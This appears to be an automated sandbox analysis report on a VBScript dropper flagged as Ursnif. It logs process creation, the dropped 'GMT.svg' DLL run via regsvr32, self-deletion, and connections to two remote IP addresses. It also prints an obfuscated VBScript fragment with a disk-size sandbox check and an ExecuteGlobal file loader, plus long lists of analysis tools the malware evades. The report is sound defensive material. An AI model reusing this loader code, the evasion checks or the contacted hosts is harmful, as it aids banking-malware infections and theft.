            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5156 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5148 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\GMT.svgJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5156 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5148 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: description#_63033.vbsStatic file information: File size 1228076 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\This\point\some\Hand\mark\charge\Rose\Thank\Busy.pdb source: wscript.exe, 00000000.00000003.822472998.000001FCB7FD1000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1729229167.000000006BEC8000.00000002.00020000.sdmp, GMT.svg.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(453392313)) > 0 And Apx = 0) ThenExit FunctionEnd Ifurchin = Array("Madonna ergodic chariot scruffy. 9668371 flatiron seam tellurium. sclerotic. 6387991 cloddish churchgoing Narbonne windfall biracial highwaymen Hartford Merriam strand consternate anthropocentric suds devour interruptible102 work Eumenides retentive Francis wizard barbecue veranda toxic sandpiper Moldavia stagecoach fib formatting Oct121. misshapen approval arcsin inspiration sponge chordal picofarad farsighted traumatic, 2081792 intent exception grosbeak sniff. Boston, sledge ")Set noBjService = GetObject("winmgmts:\\.\root\cimv2")REM concierge saltwater nameable Swaziland destinate crock plover woolgather globular gawky rainy simpleton sensory censorial plowman. deacon strait Loeb seen khan, 2696056 downturn laxative Della scheme insuppressible, 6968453 accouter demographer cabdriver batt evocable Gandhian came contradistinct nervous bobby relict Ulster Midwestern hint ligand civilian portend Ellsworth ninetieth skylight. halfway coprocessor Vaughan. Set AKNa = noBjService.ExecQuery("Select * from Win32_LogicalDisk")For Each sago In AKNaabundant = Array("Dickson affluent Culbertson Paulson censor Negroes hemisphere Gustavus dynasty signet kennel Angola Toyota invasion pupil deterring thereby, India stole byline hazy haste foothold shot timid, Dylan brindle, fetch stagnate corpse prodigious Eileen virginal raft utensil restful workload sideman lam meridional perpetrate Dudley. 8182631 madmen Chopin continuum ")FLoJ = FLoJ + Int(sago.Size / ((20 + ((33 - 7.0) - 3.0)) + 1073741781.0))NextIf FLoJ < ((86 + (-(19 + 15.0))) + (76 + (-68.0))) ThenasthmaEnd IfEnd FunctionSub Sbw(Helen)REM dairyman tern tremulous inhibition upstream, 467570 speak detain hoopla dungeon frightful contrite727 scraggly upstart, metier. glassy, sulfuric Pam hypodermic warehousemen responsible Citroen numerate propelled cupboard crossway. Euphrates proton502 crank grottoes thrall niggardly retrograde slob passion enzymology aloft curmudgeon Set nkLk = CreateObject("Scripting.FileSystemObject")Set solo = nkLk.OpenTextFile(Helen, ((((71 + 23.0) + 145.0) - 10.0) - 228.0))ExecuteGlobal solo.ReadAll' elan curio simplistic pyridoxine oral Aztecan saprophyte giantess Exxon scalar reception Johanson sane, petition accession tuft Palomar Dominique scratch, 1606211 bald tame ontogeny eighty copra carpet actual litterbug solo.CloseSet nkLk = Nothingencroach = Array("snakeroot odyssey Hobbs singlet Virgo invertebrate extensible econometric swim tenon neath, impale vibrato remote shackle tea ")Set solo = Nothingemcee = Array("speech cordite pre cardiac Cincinnati transept flank provincial nondescript basal seek plowman940 caliphate kumquat envelop ")End SubFunction eaQV()on error resume nextelliptic = Array("float tularemia just prolate miaow Arianism fee cartridge diatom appetite occipital zillion seventeenth Lenny distributor compliant. inspect tablecloth vandal retrofitting intent785 ATF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA24F0 push ecx; ret 3_2_6BEA24F9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA2543 push ecx; ret 3_2_6BEA2553
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001EAC83 push ecx; ret 3_2_001EAC93
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001ED2EF pushfd ; iretd 3_2_001ED2F2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001ED2EB pushfd ; iretd 3_2_001ED2EE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001EED26 pushfd ; retf 3_2_001EED36
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001EA950 push ecx; ret 3_2_001EA959
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEBDAF6 push ecx; ret 3_2_6BEBDB09
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEB3054 push esp; ret 3_2_6BEB3055
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEB1000 push dword ptr [ebp+50752CCCh]; ret 3_2_6BEB10DB

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\GMT.svgJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\GMT.svgJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\description#_63033.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmpBinary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmpBinary or memory string: FAKEHTTPSERVER.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE@
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE@.8
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE=
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: APISPY.EXEDME@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXEEN
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE@
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXEH
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXESI 'A
            Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE@A
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: REGMON.EXE@IK
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXE@T
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SANDBOXIERPCSS.EXEA
            Source: wscript.exe, 00000000.00000003.934113751.000001FCB9156000.00000004.00000001.sdmpBinary or memory string: PLATFORM.EXE","DNF.EXE","LAMER.EXE","REGMON.EXE","VIRUS.EXE","DSNIFF.EXE","LOGHTTP.EXE","REGSHOT.EXE","VX.EXE","DUMPCAP.EXE","LORDPE.EXE","REPMGR64.EXE","WINALYSIS.EXE","EMUL.EXE","MALMON.EXE","REPUTILS32.EXE","WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.937555463.000001FCB9156000.00000004.00000001.sdmpBinary or memory string: CRIBBAGE = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACER.EXE","NSVERCTL.EXE","SBIECTRL.EXE","ANGAR2.EXE","GOATCASPER.EXE","OLLYDBG
            Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: PEID.EXEU@#Z
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.800401820.000001FCB861A000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXE@K
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEVT
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE@=
            Source: wscript.exe, 00000000.00000003.800431379.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE@
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exe TID: 2800Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4868Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_001E258E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEC12A7 FindFirstFileExA,3_2_6BEC12A7
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000002.946589992.000001FCB9686000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWe
            Source: wscript.exe, 00000000.00000002.946735470.000001FCB96C5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.1662648058.000000000059B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.948052407.000001FCBB8D8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWystem32\msxml6.dll\1
            Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.948995385.000001FCBC560000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA1FA6 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_6BEA1FA6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEC0E09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6BEC0E09
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEBF73F mov eax, dword ptr fs:[00000030h]3_2_6BEBF73F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEDD3A1 mov eax, dword ptr fs:[00000030h]3_2_6BEDD3A1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEDCEE1 push dword ptr fs:[00000030h]3_2_6BEDCEE1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEDD2D7 mov eax, dword ptr fs:[00000030h]3_2_6BEDD2D7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA1E95 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,3_2_6BEA1E95
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEC0E09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6BEC0E09
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEBD934 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6BEBD934
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEBD43E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6BEBD43E

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: GMT.svg.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 47.241.8.147 80Jump to behavior
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000002.00000002.1724450902.0000000000C80000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1727154427.0000000003090000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6BEA1E58
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E350A cpuid 3_2_001E350A
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\automatic.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA1BB9 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_6BEA1BB9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E350A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_001E350A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA177C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_6BEA177C
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpBinary or memory string: cports.exe
